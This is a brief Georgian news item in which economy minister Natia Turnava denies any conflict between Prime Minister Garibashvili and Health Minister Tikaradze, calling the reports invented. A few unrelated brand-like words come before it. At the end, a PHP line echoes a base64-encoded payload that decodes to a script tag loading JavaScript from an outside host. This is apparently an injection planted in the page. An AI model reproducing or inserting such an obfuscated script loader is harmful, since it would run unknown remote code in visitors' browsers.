celsiusi
ავერსი საქკაბელი
საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრის ნათია თურნავას განცხადებით, მმართველი გუნდის წევრებს შორის არანაირი დაპირისპირება არაა. 
 
კითხვაზე - საქართველოს პრემიერ-მინისტრს ირაკლი ღარიბაშვილსა და ჯანდაცვის მინისტრს ეკატერინე ტიკარაძეს შორის დაპირისპირება არის, თუ არა, თურნავამ უპასუხა, რომ მმართველი გუნდის წევრებს ერთმანეთთან ძალიან კარგი, კოლეგიალური ურთიერთობები აქვთ.
 
„ჩვენ ძალიან კარგი, კოლეგიალური ურთიერთობები გვაქვს. ახლაც საბჭო მიმდინარეობს, რომელიც პანდემიის მართვას ეხება, ყველაფერს კოლეგიალურად ვწყვეტთ. არანაირი დაპირისპირება არ არსებობს, ეს ყურით მოთრეული, მოგონილი თემაა. იმისთვის, რომ თითქოს რაღაც ხდება. არაფერიც არ ხდება, მთავრობა მოწოდების სიმაღლეზეა - ებრძვის პანდემიას და ზრდის ეკონომიკას“, - განაცხადა თურნავამ.
1496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");